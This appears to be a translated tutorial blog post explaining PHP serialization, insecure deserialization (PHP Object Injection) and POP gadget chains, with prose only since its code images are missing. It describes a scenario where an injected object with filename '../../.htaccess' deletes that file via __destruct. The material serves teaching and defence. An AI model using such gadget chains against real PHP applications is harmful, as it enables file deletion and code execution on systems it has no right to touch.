Overview of the Deserialization attack method in PHP

Tram Ho

Process of Serialization and Deserialization of objects

  • Serialization is the process of converting the information state of an object into a form that can be stored or transmitted. The converted information can be stored on a disk. During transmission over the network, it can be in the form of bytes, XML, JSON, …
  • Deserialization is the opposite of serialization, taking data from structured formats, recovering information in bytes, XML, JSON, etc. into objects.

Object Serialization Process:
  • In the PHP language, the function that supports Serialization of objects is serialize( ) . The input of this function is an object and the output of the function will be a string to store that object, specifically, it will store the object’s class and object’s properties.

  • Here, don’t create a Student class with $ name and $ age attributes, along with the setName( ) , getName( ) , setAge( ) , getAge (), and two magic methods __sleep( ) , __wakeup( ) . Next initialize a $ student object and initialize the attribute value for the $ student object through two methods setName( ) , and setAge( ) .
  • The type of the object before being serialized:

  • Next, call the serialize () function, the parameter passed to the method is an object, in the $ student object passed. The serialize () function returns a string that stores the object passed. This string will be saved to $ serializeStudent. The form of the object after being serialized:

The process of object Deserialization

  • In the PHP language, the function that supports object Deserialization is unserialize( ) . The input of this method is a string representing the object. The output is an object that is rebuilt from the string passed to the unserialize( ) function.

  • Here, use the $ serializeStudent variable passed to the unserialize( ) function to rebuild the object from $serializeStudent and save to the $deserializeStudent variable. Here are the results:

  • The result obtained after deserialize from the variable $serializeStudent same as the object type before being serialize .

Introducing the Deserialization flaw

  • In TOP10 OWASP 2017, OWASP ranked this vulnerability in 8th place: Top 10-2017 A8- Insecure Deserialization. The application suffers from this vulnerability when not checking the input data before performing deserialize. Malformed data or unwanted data can be exploited to change the application’s processing flow, which could result in denial of service attacks or arbitrary code execution.
  • The Deserialization vulnerability in PHP or another name called PHP Object Injection can help an attacker perform different types of attacks, such as Code Injection , SQL Injection , Path Traversal , DDos , depending on the context. This vulnerability occurs when the input data is not checked properly before being passed to the PHP unserialize() . With the __wakeup() , __destruct() , __toString() method methods, along with the POP chain helps the attacker execute this error.
  • In 2010, Stefan Ess gave a presentation at the BlackHat conference that addressed the risks of taking advantage of PHP Object Injection errors with a platform built on the PHP language that WordPress uses serialize() and unserialize() . Based on that, 2013, Tom van Goethem, PhD in Belgium have found vulnerabilities PHP Object Injection platform WordPress (version 3.6.1) .Also in 2013, another platform is Joomla also similar vulnerabilities self (CVE2013-3242). In 2015, Johannes Dahse, a German PhD, discovered a PHP Object Injection vulnerability in an e-commerce software built on the PHP language Magento(version . Subsequently, witnessing an increase in the Deserialization vulnerability on many web applications allows for both remote code execution (RCE) attacks and remote administration of victims’ computers. In recent years there are about 60 Deserialization vulnerabilities that can execute code remotely, over 80 vulnerabilities have been reported. 2017, OWASP ratings vulnerabilities Deserialization at No. 8 in the top 10 OWASP . These statistics show the dangers as well as the prevalence of vulnerabilities on the PHP platform.

Property Oriented Programming Technique

  • Memory-related vulnerabilities such as buffer overflow, malformations, have long been known. Protection methods such as ASLR and DEP are widely deployed to combat the exploitation of the above vulnerabilities. However, an attacker can use other techniques to bypass the upper layer of defense, such as the Code reuse technique. Code reuse techniques such as ReturntoLibc , Return-Oriented Programming and Jump-Oriented Programming can overcome some of these defenses. With ROP and JOP , an attacker can reuse the code in the program (called gadgets ) and combine them to build into payload (gadget chains ).
  • In 2009 Esser demonstrated the Code reuse technique that exists on PHP applications. Specifically, he introduced the ability to attack to insert Web objects that an attacker can modify the properties of the object. Therefore, data and control flow of the application may be changed. And he also coined the term Property-Oriented Programming ( POP ).
  • Property-Oriented Programming ( POP ) is when we can control the properties of the object and can affect the execution flow of the program. A POP gadget is a piece of code that we can affect the properties of some objects. This is a high-level ROP (a technique used in exploiting memory corruption). Instead of the ROP gadget pushing values ​​onto the stack, the POP gadget allows us to write some data to the file . Code reuse attacks can also occur based on existing code, called gadge t, that is executed to perform an unwanted action such as executing arbitrary system commands. The Deserialization process can set arbitrary values ​​of the variables, allowing an attacker to take control of some data. This also allows an attacker to use a gadget to call a second gadget , since methods are often called on objects and stored for entity variables. When a type of gadget linked together, it is a gadget chain .
  • An important point here is that exploiting the Deserialize vulnerability Deserialize not sending the code to the program for execution. We simply send the properties of the classes the server already knows to perform code manipulations that already exist, relative to those properties. To successfully exploit the Deserialization flaw, there are two conditions needed:
    1. The entry point, where the attacker sends serialize data to the target and the target will perform deserialize segment.
    2. An attacker could manipulate one or more pieces of code through the deserialize process.
  • For example, there are two prerequisites that a PHP application needs to meet in order to use POP to exploit a PHP Object Injection vulnerability. First, there is at least one magic method called when the application is running, correctly identified in the class of the object the attacker wants to inject . Second, the selected class needs to be loaded within the scope of the unserialize() call, and the attacker can control the input of the unserialize() function.
  • In the scenario below, there are 3 gadgets combined to form an arbitrary file deletion vulnerability.

  • The POI vulnerability exists on line 19 , where the user can input data and the program executes deserialize . On line 20 , 21 attackers inserted a Database object with the handle property set to an object of the TempFile class. The filename attribute is set to ../../.htaccess .
  • When the application finishes, the inserted database object will be executed by the automatically called __destruct() function. Because the handle attribute has been inserted as a TempFile class object, call the shutdown() function of the File class. The shutdown() function will call the close method that is inherited from the TempFile class. Here, the filename that the attacker passed will be deleted by the program. As a result, the .htaccess file has been deleted.

Tobe continue …

Share the news now

Source : Viblo